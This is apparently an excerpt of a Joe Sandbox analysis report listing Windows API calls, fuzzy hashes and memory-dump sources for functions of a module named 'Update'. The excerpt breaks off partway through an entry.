                                              • Opcode Fuzzy Hash: 0ef450b9ec7669e7562870a54eb7a1e8eac592a129c07bf951e68cc41d5095c7
                                              • Instruction Fuzzy Hash: 0121D8313056029FFF009B55D848B6DBBF9BB87715F110216E43A97A90CB3098168B91
                                              APIs
                                              • LocalAlloc.KERNEL32(00000000,00000000), ref: 6C1EEA11
                                              • LocalReAlloc.KERNEL32(00000000,00000000,00000002), ref: 6C1EEA1F
                                              • TlsSetValue.KERNEL32 ref: 6C1EEA50
                                              • LeaveCriticalSection.KERNEL32(6C1CB283,?,00000000,?,6C1D871F,?,?,?,6C1D3FF4,00000000,00000000,?,?,6C1DBF77,00000004,6C1CB283), ref: 6C1EEA6E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AllocLocal$CriticalLeaveSectionValue
                                              • String ID:
                                              • API String ID: 901235349-0
                                              • Opcode ID: 43a32073b8ad214a14302269dc5430582b1ce5b8bf23f3827cdd43e0956be430
                                              • Instruction ID: a6efc89885bc1f165a8d5d00d4aa297f61fb76c960be03f98d6e84dcf152278c
                                              • Opcode Fuzzy Hash: 43a32073b8ad214a14302269dc5430582b1ce5b8bf23f3827cdd43e0956be430
                                              • Instruction Fuzzy Hash: 03116074201A12DFEB249F15C844A5A7BB5FF8A314B14C42DE85ADAA60DB30E944CF91
                                              APIs
                                              • IsWindow.USER32(?), ref: 6C1D0BD6
                                              • SendMessageW.USER32(?,00000420,00000000,0000E800), ref: 6C1D0BFA
                                              • SendMessageW.USER32(?,0000041F,00000000,0000E800), ref: 6C1D0C17
                                              • SendMessageW.USER32(?,0000043A,00000000,00000000), ref: 6C1D0C33
                                              • InvalidateRect.USER32(?,00000000,00000001,?,6C1D0BBA,?,?,?,?,ToolbarWindow32,00000000,?,?,?,0000E800,00000000), ref: 6C1D0C51
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: MessageSend$InvalidateRectWindow
                                              • String ID:
                                              • API String ID: 3225880595-0
                                              • Opcode ID: 709ad2a31958ca7eb2e445ebdeba51128204f2ba3c908695b1c8121eb964b116
                                              • Instruction ID: d816b6e8be696ccd8969e13afb66533a222bfd6875c5fdd4580943d6a7404fbd
                                              • Opcode Fuzzy Hash: 709ad2a31958ca7eb2e445ebdeba51128204f2ba3c908695b1c8121eb964b116
                                              • Instruction Fuzzy Hash: 27111271201654AFEB148F25D808BBB7BF9FB85741F00892EF99B96150E7B1A850DB20
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C232E46
                                              • IsWindowVisible.USER32(?), ref: 6C2332A4
                                                • Part of subcall function 6C1D460B: GetWindowTextLengthW.USER32(?), ref: 6C1D461D
                                                • Part of subcall function 6C1D460B: GetWindowTextW.USER32(?,00000000,00000001), ref: 6C1D4636
                                                • Part of subcall function 6C25E6B9: __EH_prolog3.LIBCMT ref: 6C25E6C0
                                              • ClientToScreen.USER32(00000000,?), ref: 6C2331A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Text$ClientH_prolog3H_prolog3_LengthScreenVisible
                                              • String ID: DUMMY
                                              • API String ID: 1879877427-3097505935
                                              • Opcode ID: 3662617f5f40581bf4e3e110763ceb826c05d6769218d288214adee9a3605cf0
                                              • Instruction ID: 3e272b6115fc278bd4a06dd603e663975280fca537dfa4d99cefc16c685a2260
                                              • Opcode Fuzzy Hash: 3662617f5f40581bf4e3e110763ceb826c05d6769218d288214adee9a3605cf0
                                              • Instruction Fuzzy Hash: 9DD19C70A012299FEF05DB68C894BEDB7B9AF49358F100199E81AA77C0DF34AE45CF51
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 6C232AFC
                                              • OffsetRect.USER32(?,?,?), ref: 6C232B3D
                                              • FillRect.USER32(?,?,-00000098), ref: 6C232B92
                                                • Part of subcall function 6C1F6E3A: __EH_prolog3.LIBCMT ref: 6C1F6E41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$FillH_prolog3OffsetWindow
                                              • String ID: 0^5l
                                              • API String ID: 1391168360-1366870978
                                              • Opcode ID: 82367190957967a5ccfb5dcfabe9e4f4f62c48bb0bf2343af178851c92cdefab
                                              • Instruction ID: d148fdd536ceaf66fc16931b13a23f6df98c1c339e104af033a50485e9365f0d
                                              • Opcode Fuzzy Hash: 82367190957967a5ccfb5dcfabe9e4f4f62c48bb0bf2343af178851c92cdefab
                                              • Instruction Fuzzy Hash: FD415C72E005199FDF05DFA8D944AEEBBBAFF4A304F150055F806AB210DB71AE05CB91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CreateFocusH_prolog3MenuPopup
                                              • String ID: T}4l2L l
                                              • API String ID: 1810032065-150602006
                                              • Opcode ID: a3b54cf10ecfa62f9d8da5e686d1d221937072051b789afb62044eaaf023d487
                                              • Instruction ID: 846e2cf526285820e4e889eba181b25961a43a84bcca2a4bb157c86f7c5054b5
                                              • Opcode Fuzzy Hash: a3b54cf10ecfa62f9d8da5e686d1d221937072051b789afb62044eaaf023d487
                                              • Instruction Fuzzy Hash: 1F51CE75B0170A8BDF01EF658480ABE7BF5AF4A749F50002AED17A7B50EF309955CB81
                                              APIs
                                              • ReleaseCapture.USER32 ref: 6C232471
                                              • KillTimer.USER32(?,?), ref: 6C2324A9
                                              • ReleaseCapture.USER32 ref: 6C232562
                                                • Part of subcall function 6C2320CF: IsWindowVisible.USER32(?), ref: 6C232125
                                                • Part of subcall function 6C2320CF: GetParent.USER32(?), ref: 6C23215B
                                                • Part of subcall function 6C2320CF: ReleaseCapture.USER32 ref: 6C23223A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CaptureRelease$KillParentTimerVisibleWindow
                                              • String ID: 0^5l
                                              • API String ID: 3579941792-1366870978
                                              • Opcode ID: 915d56e0b3c00af54cb79c748ae752c0d11829cbd7083f299643a9460b616b9a
                                              • Instruction ID: 84b9a1312949affc4eca408a720b4255a15a2f94130645634cf6108d90fe6716
                                              • Opcode Fuzzy Hash: 915d56e0b3c00af54cb79c748ae752c0d11829cbd7083f299643a9460b616b9a
                                              • Instruction Fuzzy Hash: E4412BB53006269BDF099B65C858BEEBB6ABF86705F140039ED0A97781CF709D05CBE1
                                              APIs
                                              • InflateRect.USER32(00000000,00000000,000000FF), ref: 6C227000
                                              • InflateRect.USER32(00000000,00000000,000000FD), ref: 6C227058
                                              • FillRect.USER32(?,00000000,?), ref: 6C22706E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Inflate$Fill
                                              • String ID: (^4l
                                              • API String ID: 309753019-3721299443
                                              • Opcode ID: 52c638cbf70f987c04ad13959ccef01cfd6e383b19ad38de0d514a6b6484ff5e
                                              • Instruction ID: fd1b21721bf6ae7ef60991028a79005a6ff553297b4d2a547e58af574542e034
                                              • Opcode Fuzzy Hash: 52c638cbf70f987c04ad13959ccef01cfd6e383b19ad38de0d514a6b6484ff5e
                                              • Instruction Fuzzy Hash: 35312D31A0020E9FDF01DFA8C885AEFBBB5FF0A314F100565F911AB280DB759A05CB91
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C1FCBE5
                                              • SendMessageW.USER32(00000000,0000040D,00000000,00000000), ref: 6C1FCC10
                                              • SendMessageW.USER32(?,0000043A,-00000001,00000030), ref: 6C1FCC58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: MessageSend$H_prolog3_
                                              • String ID: 0
                                              • API String ID: 3491702567-4108050209
                                              • Opcode ID: a11c5ba9a743bfe26bba0e44886d1213073571f5e6e588fb8ff55c200036cc1f
                                              • Instruction ID: a5f313de329c0e6fe8d480fbdceea9138b6b80bf7d84d59c5d1422a5d8d486e4
                                              • Opcode Fuzzy Hash: a11c5ba9a743bfe26bba0e44886d1213073571f5e6e588fb8ff55c200036cc1f
                                              • Instruction Fuzzy Hash: 5A318074600229AFDB24DB64CC94FEDB7B8BF45308F000299E52DA7690DB706A85DF61
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C2A49CA
                                              • FillRect.USER32(?,?,-000000D0), ref: 6C2A4A0E
                                              • FillRect.USER32(00000000,?,?), ref: 6C2A4A6D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: FillRect$H_prolog3_
                                              • String ID: (^4l
                                              • API String ID: 2465756759-3721299443
                                              • Opcode ID: 431a85cb82158b9e89c58c4a1f9d0c7c68e8c3d886e70d41b22171848dd9dd5c
                                              • Instruction ID: e07ec07309eff136a7f9c43f1b0bd57bc5ea629fb185973c321027e5d296e003
                                              • Opcode Fuzzy Hash: 431a85cb82158b9e89c58c4a1f9d0c7c68e8c3d886e70d41b22171848dd9dd5c
                                              • Instruction Fuzzy Hash: 7E315871A01208AFDB01DFA4C855ADEBBB9EF0A324F144019F815B7751CB34AE09CFA5
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 6C202E1F
                                              • ScreenToClient.USER32(?,?), ref: 6C202E2C
                                              • SendMessageW.USER32(?,00000030,-0000011C,00000000), ref: 6C202EB4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ClientCursorMessageScreenSend
                                              • String ID: ,
                                              • API String ID: 3733300889-3772416878
                                              • Opcode ID: a0219164d39f4459302910805a2a8d5ce6f5787006adf81ae5e0183868c0da4a
                                              • Instruction ID: 0e47bd9437b0462ee441f092504f7e65ade8085edf6417acd661fbfb616c37a1
                                              • Opcode Fuzzy Hash: a0219164d39f4459302910805a2a8d5ce6f5787006adf81ae5e0183868c0da4a
                                              • Instruction Fuzzy Hash: 21315971B02119AFDB05DFA5DC48AAEBBFDEF09319B104027B915EB650DB30A914CBA1
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C1E84C7
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 6C1E84EB
                                              • GetClassInfoW.USER32(?,?,?), ref: 6C1E8526
                                                • Part of subcall function 6C1D8A78: __EH_prolog3_catch.LIBCMT ref: 6C1D8A7F
                                                • Part of subcall function 6C1D8A78: GetClassInfoW.USER32(?,?,?), ref: 6C1D8A91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ClassInfo$CursorH_prolog3H_prolog3_catchLoad
                                              • String ID: %Ts:%x:%x:%x:%x
                                              • API String ID: 937286869-4057404147
                                              • Opcode ID: 5114c729c0f109ec95fdfa9b27e69fe5c6af2f4f5183b5fb0e5a0cf725818c57
                                              • Instruction ID: a62afdaec0b423e52b4685ee441f4581307aa557ae8197f3dd0f58e145be50f4
                                              • Opcode Fuzzy Hash: 5114c729c0f109ec95fdfa9b27e69fe5c6af2f4f5183b5fb0e5a0cf725818c57
                                              • Instruction Fuzzy Hash: B021FEB4E41619AFEB40DFA9C884BDEBBF4BF18308F10442AE544E6740DB755944CBA5
                                              APIs
                                                • Part of subcall function 6C1EC870: EnterCriticalSection.KERNEL32(6C3A0410,?,?,?,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8A1
                                                • Part of subcall function 6C1EC870: InitializeCriticalSection.KERNEL32(00000000,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8B7
                                                • Part of subcall function 6C1EC870: LeaveCriticalSection.KERNEL32(6C3A0410,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8C5
                                                • Part of subcall function 6C1EC870: EnterCriticalSection.KERNEL32(00000000,?,?,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8D2
                                                • Part of subcall function 6C1EEBED: __EH_prolog3_catch.LIBCMT ref: 6C1EEBF4
                                                • Part of subcall function 6C1D3CA8: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C1D3CCE
                                                • Part of subcall function 6C1D3CA8: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C1D3CDE
                                                • Part of subcall function 6C1D3CA8: EncodePointer.KERNEL32(00000000), ref: 6C1D3CE7
                                              • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6C1D8E7F
                                              • FreeLibrary.KERNEL32(?,?,?,6C1D4CCA,?,?,?,?,00000004,00000004), ref: 6C1D8E8F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CriticalSection$AddressEnterProc$EncodeFreeH_prolog3_catchHandleInitializeLeaveLibraryModulePointer
                                              • String ID: HtmlHelpW$hhctrl.ocx
                                              • API String ID: 849444252-3773518134
                                              • Opcode ID: 24d9dd50c836ebda199365012edc063af2a7d0699bbc43a85422f1d25f1dfaf2
                                              • Instruction ID: 88c789398453268e34cd8ec511a8c6f1eed8425b37ecfee93927ce0f1be304d1
                                              • Opcode Fuzzy Hash: 24d9dd50c836ebda199365012edc063af2a7d0699bbc43a85422f1d25f1dfaf2
                                              • Instruction Fuzzy Hash: E701AC31500B1BABDB21AFB1CC14B8B7AB5AF05358F01592AF95AD6E50DB34E4109F91
                                              APIs
                                              • KillTimer.USER32(?,0000EC1A,?,?,?,6C23A7DE,?,00000001,?), ref: 6C2B2502
                                              • GetFocus.USER32 ref: 6C2B250E
                                              • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,?,?,?,6C23A7DE,?,00000001), ref: 6C2B253C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: FocusKillRedrawTimerWindow
                                              • String ID: y
                                              • API String ID: 1950525498-4225443349
                                              • Opcode ID: 0094875034643ad58a201379246bfab57eaa80a92c0361a433fc0ee4bac0bef1
                                              • Instruction ID: 687ff2272300d633fd142f408be7a1c51f54ff12f041f800dafa05778428737e
                                              • Opcode Fuzzy Hash: 0094875034643ad58a201379246bfab57eaa80a92c0361a433fc0ee4bac0bef1
                                              • Instruction Fuzzy Hash: B90126B234531DEBCB294A66C90888EBB38FB4B7AA7048121FC5AA1C10C7B18440CFD0
                                              APIs
                                              • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 6C1E4A75
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6C1E4A85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: Advapi32.dll$RegDeleteKeyTransactedW
                                              • API String ID: 1646373207-2168864297
                                              • Opcode ID: 55f7de3f2944ab7b5700108b0d9e07bd8c7a404f5fd4577028c19cb193e8f286
                                              • Instruction ID: 3d4d9fd5de714e5c1d0f8835a5235b7e95709560477e4b5cfdfe04084ab0cf81
                                              • Opcode Fuzzy Hash: 55f7de3f2944ab7b5700108b0d9e07bd8c7a404f5fd4577028c19cb193e8f286
                                              • Instruction Fuzzy Hash: E9F0BB37301519AFAF115ED4DC4487677EDEBEA2B6711443EF553D1A00C6718C008B64
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C1E8D80
                                              • SystemParametersInfoW.USER32(00000029,000001F8,?,00000000), ref: 6C1E8DDB
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E8DE8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
